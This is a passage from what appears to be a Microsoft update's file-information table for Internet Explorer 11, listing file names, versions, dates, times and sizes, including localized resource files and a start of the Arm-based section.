\nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:24| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:48| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 20:47| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:12| 785,408 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:22| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported Arm-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 20:58| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 18:58| 1,035,264 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 